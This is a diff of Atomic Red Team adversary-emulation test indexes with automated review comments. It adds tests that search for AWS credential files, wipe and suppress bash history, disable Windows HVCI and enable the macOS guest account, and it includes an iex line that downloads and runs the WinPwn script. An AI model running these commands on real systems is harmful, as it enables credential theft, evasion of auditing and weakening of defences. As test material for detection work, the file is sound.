description: This test enables the guest account on macOS using sysadminctl
|
||||
utility.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
command: sudo sysadminctl -guestAccount on
|
||||
cleanup_command: sudo sysadminctl -guestAccount off
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1547.003:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -46394,6 +46609,10 @@ execution:
|
||||
description: Command to run
|
||||
type: string
|
||||
default: uname
|
||||
path:
|
||||
description: Path to busybox.yaml file
|
||||
type: string
|
||||
default: "$PathtoAtomicsFolder/T1609/src/busybox.yaml"
|
||||
dependencies:
|
||||
- description: 'kubectl must be installed
|
||||
|
||||
@@ -46406,7 +46625,9 @@ execution:
|
||||
'
|
||||
executor:
|
||||
command: |
|
||||
kubectl create -f src/busybox.yaml -n #{namespace}
|
||||
kubectl create -f #{path} -n #{namespace}
|
||||
# wait 3 seconds for the instance to come up
|
||||
sleep 3
|
||||
kubectl exec -n #{namespace} busybox -- #{command}
|
||||
cleanup_command: 'kubectl delete pod busybox -n #{namespace}
|
||||
|
||||
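Review bot: The new `sleep 3` after `kubectl create -f #{path}` is a fixed delay, so when the busybox image pull takes longer the following `kubectl exec` fails because the container is not yet running; `kubectl wait --for=condition=Ready pod/busybox -n #{namespace} --timeout=60s` blocks on the actual pod state and replaces both the `# wait 3 seconds for the instance to come up` comment and the sleep. The enclosing test starts before this hunk.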
@@ -56329,6 +56550,17 @@ persistence:
|
||||
'
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Enable Guest Account on macOS
|
||||
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
description: This test enables the guest account on macOS using sysadminctl
|
||||
utility.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
command: sudo sysadminctl -guestAccount on
|
||||
cleanup_command: sudo sysadminctl -guestAccount off
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1547.003:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -81627,6 +81859,25 @@ credential-access:
|
||||
- Access to files
|
||||
identifier: T1552.001
|
||||
atomic_tests:
|
||||
- name: Find AWS credentials
|
||||
auto_generated_guid: 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
|
||||
description: 'Find local AWS credentials from file, defaults to using / as the
|
||||
look path.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
type: string
|
||||
default: "/"
|
||||
executor:
|
||||
command: 'find #{file_path} -name "credentials" -type f -path "*/.aws/*" 2>/dev/null
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Extract Browser and System credentials with LaZagne
|
||||
auto_generated_guid: 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79
|
||||
description: "[LaZagne Source](https://github.com/AlessandroZ/LaZagne)\n"
|
||||
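Review bot: `find #{file_path} -name "credentials" -type f -path "*/.aws/*" 2>/dev/null` expands the input argument unquoted, so a `file_path` containing spaces is split into several arguments; `find "#{file_path}" -name "credentials" -type f -path "*/.aws/*" 2>/dev/null` keeps it as one path. Because stderr is discarded and the executor sets no `elevation_required`, a run as an unprivileged user returns an empty result for directories it cannot read, which is indistinguishable from "no credentials present"; a description line noting that the search covers only readable paths, or `elevation_required: true`, would set expectations for the tester. The same test is added in the two later credential-access hunks (@@ -54281 and @@ -51998).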
@@ -90382,6 +90633,43 @@ discovery:
|
||||
|
||||
'
|
||||
name: powershell
|
||||
- name: Permission Groups Discovery for Containers- Local Groups
|
||||
auto_generated_guid: 007d7aa4-8c4d-4f55-ba6a-7c965d51219c
|
||||
description: Attackers may try to obtain a list of services that are operating
|
||||
on remote hosts and local network infrastructure devices, in order to identify
|
||||
potential vulnerabilities that can be exploited through remote software attacks.
|
||||
They typically use tools to conduct port and vulnerability scans in order
|
||||
to obtain this information.
|
||||
supported_platforms:
|
||||
- containers
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: Verify docker is installed.
|
||||
prereq_command: 'which docker
|
||||
|
||||
'
|
||||
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
|
||||
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
|
||||
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
|
||||
echo "Docker installed"; fi
|
||||
|
||||
'
|
||||
- description: Verify docker service is running.
|
||||
prereq_command: 'sudo systemctl status docker --no-pager
|
||||
|
||||
'
|
||||
get_prereq_command: 'sudo systemctl start docker
|
||||
|
||||
'
|
||||
executor:
|
||||
command: |-
|
||||
docker build -t t1069 $PathtoAtomicsFolder/T1069.001/src/
|
||||
docker run --name t1069_container -d -t t1069
|
||||
docker exec t1069_container ./test.sh
|
||||
cleanup_command: |-
|
||||
docker stop t1069_container
|
||||
docker rmi -f t1069
|
||||
name: sh
|
||||
T1201:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
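Review bot: The description of 'Permission Groups Discovery for Containers- Local Groups' is the Network Service Discovery text ("obtain a list of services that are operating on remote hosts ... port and vulnerability scans"), which does not describe a local-group enumeration test and is the same wording used by the T1046 test added further down. It should state what `./test.sh` in `T1069.001/src/` actually does so that the generated documentation and any detection mapped to this test describe the right behaviour.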
@@ -91877,7 +92165,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
@@ -92079,6 +92367,43 @@ discovery:
|
||||
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
||||
fruit -noninteractive -consoleoutput
|
||||
name: powershell
|
||||
- name: Network Service Discovery for Containers
|
||||
auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa
|
||||
description: Attackers may try to obtain a list of services that are operating
|
||||
on remote hosts and local network infrastructure devices, in order to identify
|
||||
potential vulnerabilities that can be exploited through remote software attacks.
|
||||
They typically use tools to conduct port and vulnerability scans in order
|
||||
to obtain this information.
|
||||
supported_platforms:
|
||||
- containers
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: Verify docker is installed.
|
||||
prereq_command: 'which docker
|
||||
|
||||
'
|
||||
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
|
||||
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
|
||||
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
|
||||
echo "Docker installed"; fi
|
||||
|
||||
'
|
||||
- description: Verify docker service is running.
|
||||
prereq_command: 'sudo systemctl status docker --no-pager
|
||||
|
||||
'
|
||||
get_prereq_command: 'sudo systemctl start docker
|
||||
|
||||
'
|
||||
executor:
|
||||
command: |-
|
||||
docker build -t t1046 /root/AtomicRedTeam/atomics/T1046/src/
|
||||
docker run --name t1046_container -d -t t1046
|
||||
docker exec t1046_container ./test.sh
|
||||
cleanup_command: |-
|
||||
docker stop t1046_container
|
||||
docker rmi -f t1046
|
||||
name: sh
|
||||
T1518:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
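Review bot: `docker build -t t1046 /root/AtomicRedTeam/atomics/T1046/src/` hardcodes an install path, unlike the sibling container tests which use `$PathtoAtomicsFolder/T1612/src/` and `$PathtoAtomicsFolder/T1069.001/src/`; it should be `docker build -t t1046 $PathtoAtomicsFolder/T1046/src/` so the test runs from any checkout location and does not require the atomics to live under root's home. With the current value the build step fails silently on most hosts and the subsequent `docker run` and `docker exec` then report errors unrelated to the technique.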
@@ -104873,6 +105198,17 @@ initial-access:
|
||||
'
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Enable Guest Account on macOS
|
||||
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
description: This test enables the guest account on macOS using sysadminctl
|
||||
utility.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
command: sudo sysadminctl -guestAccount on
|
||||
cleanup_command: sudo sysadminctl -guestAccount off
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1193:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
|
||||
@@ -9568,6 +9568,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -10437,6 +10438,115 @@ defense-evasion:
|
||||
3. ls
|
||||
4. whoami > recon.txt
|
||||
name: manual
|
||||
- name: Clear bash history
|
||||
auto_generated_guid: 878794f7-c511-4199-a950-8c28b3ed8e5b
|
||||
description: "An attacker may clear the bash history cache and the history file
|
||||
as their last act before logging off to remove the record of their command
|
||||
line activities. \n\nIn this test we use the $HISTFILE variable throughout
|
||||
to 1. confirms the $HISTFILE variable is set 2. echo \"\" into it 3..5 confirm
|
||||
the file is empty 6 clear the history cache 7. confirm the history cache is
|
||||
empty. This is when the attacker would logoff.\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: "cp $HISTFILE $HISTFILE.OLD\nif ((${#HISTFILE[@]})); then echo $HISTFILE;
|
||||
fi\necho \"\" > $HISTFILE\nif [ $(wc -c <$HISTFILE) -gt 1 ]; then echo \"$HISTFILE
|
||||
is larger than 1k\"; fi\nls -la $HISTFILE \ncat $HISTFILE\nhistory -c \nif
|
||||
[ $(history |wc -l) -eq 1 ]; then echo \"History cache cleared\"; fi\n"
|
||||
cleanup_command: "mv -f $HISTFILE.OLD $HISTFILE \n"
|
||||
- name: Setting the HISTCONTROL environment variable
|
||||
auto_generated_guid: 10ab786a-028e-4465-96f6-9e83ca6c5f24
|
||||
description: "An attacker may exploit the space before a command (e.g. \" ls\")
|
||||
or the duplicate command suppression feature in Bash history to prevent their
|
||||
commands from being recorded in the history file or to obscure the order of
|
||||
commands used. \n\nIn this test we 1. sets $HISTCONTROL to ignoreboth 2. clears
|
||||
the history cache 3. executes ls -la with a space in-front of it 4. confirms
|
||||
that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups
|
||||
6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms
|
||||
that their is only one command in history\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: "TEST=$(echo $HISTCONTROL)\nif [ \"$HISTCONTROL\" != \"ignoreboth\"
|
||||
]; then export HISTCONTROL=\"ignoreboth\"; fi\nhistory -c \nls -la $HISTFILE
|
||||
# \" ls -la $HISTFILE\"\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls
|
||||
-la is not in history cache\"; fi\n# -> ls -la is not in history cache\nif
|
||||
[ \"$HISTCONTROL\" != \"erasedups\" ]; then export HISTCONTROL=\"erasedups\";
|
||||
fi\nhistory -c \nls -la $HISTFILE\nls -la $HISTFILE\nls -la $HISTFILE\nif
|
||||
[ $(history |wc -l) -eq 2 ]; then echo \"Their is only one entry for ls
|
||||
-la $HISTFILE\"; fi\n"
|
||||
cleanup_command: 'export HISTCONTROL=$(echo $TEST)
|
||||
|
||||
'
|
||||
- name: Setting the HISTFILESIZE environment variable
|
||||
auto_generated_guid: 5cafd6c1-2f43-46eb-ac47-a5301ba0a618
|
||||
description: |
|
||||
An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
TEST=$(echo $HISTFILESIZE)
|
||||
echo $HISTFILESIZE
|
||||
export HISTFILESIZE=0
|
||||
if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; fi
|
||||
# -> $HISTFILESIZE is zero
|
||||
cleanup_command: 'export HISTCONTROL=$(echo $TEST)
|
||||
|
||||
'
|
||||
- name: Setting the HISTFILE environment variable
|
||||
auto_generated_guid: b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
|
||||
description: |
|
||||
An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
TEST=$(echo $HISTFILE)
|
||||
echo $HISTFILE
|
||||
export HISTFILE="/dev/null"
|
||||
if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
|
||||
# -> $HISTFILE is /dev/null
|
||||
cleanup_command: 'export HISTFILE=$(echo $TEST)
|
||||
|
||||
'
|
||||
- name: Setting the HISTIGNORE environment variable
|
||||
auto_generated_guid: f12acddb-7502-4ce6-a146-5b62c59592f1
|
||||
description: "An Adversary may take advantage of the HISTIGNORE environment
|
||||
variable either to ignore particular commands or all commands. \n\nIn this
|
||||
test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this
|
||||
history cache 3..4 execute ls commands 5. confirm that the ls commands are
|
||||
not in the history cache 6. unset HISTIGNORE variable 7.. same again, but
|
||||
ignoring ALL commands.\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: "if ((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\";
|
||||
else export HISTIGNORE='ls*:rm*:ssh*'; echo \"\\$HISTIGNORE = $HISTIGNORE\";
|
||||
fi\n# -> $HISTIGNORE = ls*:rm*:ssh*\nhistory -c \nls -la $HISTFILE\nls -la
|
||||
~/.bash_logout\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls commands
|
||||
are not in history\"; fi\n# -> ls commands are not in history\nunset HISTIGNORE\n\nif
|
||||
((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\"; else export
|
||||
HISTIGNORE='*'; echo \"\\$HISTIGNORE = $HISTIGNORE\"; fi\n# -> $HISTIGNORE
|
||||
= *\nhistory -c \nwhoami\ngroups\nif [ $(history |wc -l) -eq 0 ]; then echo
|
||||
\"History cache is empty\"; fi\n# -> History cache is empty\n"
|
||||
cleanup_command: 'unset HISTIGNORE
|
||||
|
||||
'
|
||||
T1497.002:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -54281,6 +54391,25 @@ credential-access:
|
||||
- Access to files
|
||||
identifier: T1552.001
|
||||
atomic_tests:
|
||||
- name: Find AWS credentials
|
||||
auto_generated_guid: 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
|
||||
description: 'Find local AWS credentials from file, defaults to using / as the
|
||||
look path.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
type: string
|
||||
default: "/"
|
||||
executor:
|
||||
command: 'find #{file_path} -name "credentials" -type f -path "*/.aws/*" 2>/dev/null
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Extract passwords with grep
|
||||
auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4
|
||||
description: 'Extracting credentials from files
|
||||
@@ -60174,7 +60303,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
@@ -6531,7 +6531,18 @@ defense-evasion:
|
||||
- Administrator
|
||||
- User
|
||||
identifier: T1078.001
|
||||
atomic_tests: []
|
||||
atomic_tests:
|
||||
- name: Enable Guest Account on macOS
|
||||
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
description: This test enables the guest account on macOS using sysadminctl
|
||||
utility.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
command: sudo sysadminctl -guestAccount on
|
||||
cleanup_command: sudo sysadminctl -guestAccount off
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1183:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -8920,6 +8931,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -20608,7 +20620,18 @@ privilege-escalation:
|
||||
- Administrator
|
||||
- User
|
||||
identifier: T1078.001
|
||||
atomic_tests: []
|
||||
atomic_tests:
|
||||
- name: Enable Guest Account on macOS
|
||||
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
description: This test enables the guest account on macOS using sysadminctl
|
||||
utility.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
command: sudo sysadminctl -guestAccount on
|
||||
cleanup_command: sudo sysadminctl -guestAccount off
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1547.003:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -35793,7 +35816,18 @@ persistence:
|
||||
- Administrator
|
||||
- User
|
||||
identifier: T1078.001
|
||||
atomic_tests: []
|
||||
atomic_tests:
|
||||
- name: Enable Guest Account on macOS
|
||||
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
description: This test enables the guest account on macOS using sysadminctl
|
||||
utility.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
command: sudo sysadminctl -guestAccount on
|
||||
cleanup_command: sudo sysadminctl -guestAccount off
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1547.003:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -51998,6 +52032,25 @@ credential-access:
|
||||
- Access to files
|
||||
identifier: T1552.001
|
||||
atomic_tests:
|
||||
- name: Find AWS credentials
|
||||
auto_generated_guid: 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
|
||||
description: 'Find local AWS credentials from file, defaults to using / as the
|
||||
look path.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
type: string
|
||||
default: "/"
|
||||
executor:
|
||||
command: 'find #{file_path} -name "credentials" -type f -path "*/.aws/*" 2>/dev/null
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Extract Browser and System credentials with LaZagne
|
||||
auto_generated_guid: 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79
|
||||
description: "[LaZagne Source](https://github.com/AlessandroZ/LaZagne)\n"
|
||||
@@ -57470,7 +57523,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
@@ -67632,7 +67685,18 @@ initial-access:
|
||||
- Administrator
|
||||
- User
|
||||
identifier: T1078.001
|
||||
atomic_tests: []
|
||||
atomic_tests:
|
||||
- name: Enable Guest Account on macOS
|
||||
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
description: This test enables the guest account on macOS using sysadminctl
|
||||
utility.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
command: sudo sysadminctl -guestAccount on
|
||||
cleanup_command: sudo sysadminctl -guestAccount off
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1193:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
|
||||
@@ -7766,6 +7766,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -52614,7 +52615,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
@@ -7766,6 +7766,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -52481,7 +52482,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
@@ -13083,6 +13083,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -16388,6 +16389,52 @@ defense-evasion:
|
||||
schtasks /create /xml "%temp%\Windows_Defender_Cache_Maintenance.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Disable Hypervisor-Enforced Code Integrity (HVCI)
|
||||
auto_generated_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020
|
||||
description: "This test disables Hypervisor-Enforced Code Integrity (HVCI) by
|
||||
setting the registry key HKLM:\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity
|
||||
\"Enabled\" value to \"0\".\nThe pre-req needs to be ran in order to setup
|
||||
HVCI and have it enabled. \nWe do not recommend running this in production.\n[Black
|
||||
Lotus Campaign](https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/)\n[Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity)\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: 'HVCI must be enabled
|
||||
|
||||
'
|
||||
prereq_command: 'if (((cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
|
||||
/v "EnableVirtualizationBasedSecurity" 2> nul | findstr EnableVirtualizationBasedSecurity
|
||||
2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
|
||||
/v "RequirePlatformSecurityFeatures" 2> nul | findstr RequirePlatformSecurityFeatures
|
||||
2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
|
||||
/v "Locked" 2> nul | findstr Locked 2> nul") -and (cmd.exe /c "reg query
|
||||
"HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
|
||||
/v "Enabled" 2> nul | findstr Enabled 2> nul") -and (cmd.exe /c "reg query
|
||||
"HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
|
||||
/v "Locked" 2> nul | findstr Locked 2> nul"))) { exit 0 } else { exit 1
|
||||
}
|
||||
|
||||
'
|
||||
get_prereq_command: |
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
|
||||
executor:
|
||||
command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
|
||||
/v "Enabled" /t REG_DWORD /d 0 /f
|
||||
|
||||
'
|
||||
cleanup_command: |
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
T1601:
|
||||
technique:
|
||||
x_mitre_platforms:
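Review bot: The prereq_command only tests that each DeviceGuard value exists — `reg query ... /v "Enabled" 2> nul | findstr Enabled` succeeds whether the data is 0x0 or 0x1 — so the check passes on a host where HVCI is configured but already off, and the test then "disables" something that was never on; matching the data instead, e.g. `/v "Enabled" 2> nul | findstr /C:"0x1" 2> nul`, pins the intended starting state. The cleanup_command then `reg delete`s all five values rather than restoring them, which on a host that had VBS/HVCI enabled before the test leaves it unconfigured until policy reapplies — capturing the pre-test values (or at least re-adding `Enabled`=1 where the prereq created it) would be safer than unconditional deletion. The description should also say that these registry changes only take effect after a reboot, so anyone validating a detection that expects HVCI to actually be off needs one. This hunk appears to be a generated index entry, so the fix presumably belongs in the source atomic yaml it is built from.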
|
||||
@@ -79082,7 +79129,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
+59
-1
@@ -1,4 +1,4 @@
|
||||
# T1046 - Network Service Scanning
|
||||
# T1046 - Network Service Discovery
|
||||
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1046)
|
||||
<blockquote>Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)
|
||||
|
||||
@@ -24,6 +24,8 @@ Within macOS environments, adversaries may use the native Bonjour application to
|
||||
|
||||
- [Atomic Test #8 - WinPwn - fruit](#atomic-test-8---winpwn---fruit)
|
||||
|
||||
- [Atomic Test #9 - Network Service Discovery for Containers](#atomic-test-9---network-service-discovery-for-containers)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -341,4 +343,60 @@ fruit -noninteractive -consoleoutput
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #9 - Network Service Discovery for Containers
|
||||
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
|
||||
|
||||
**Supported Platforms:** Containers
|
||||
|
||||
|
||||
**auto_generated_guid:** 06eaafdb-8982-426e-8a31-d572da633caa
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `sh`!
|
||||
|
||||
|
||||
```sh
|
||||
docker build -t t1046 /root/AtomicRedTeam/atomics/T1046/src/
|
||||
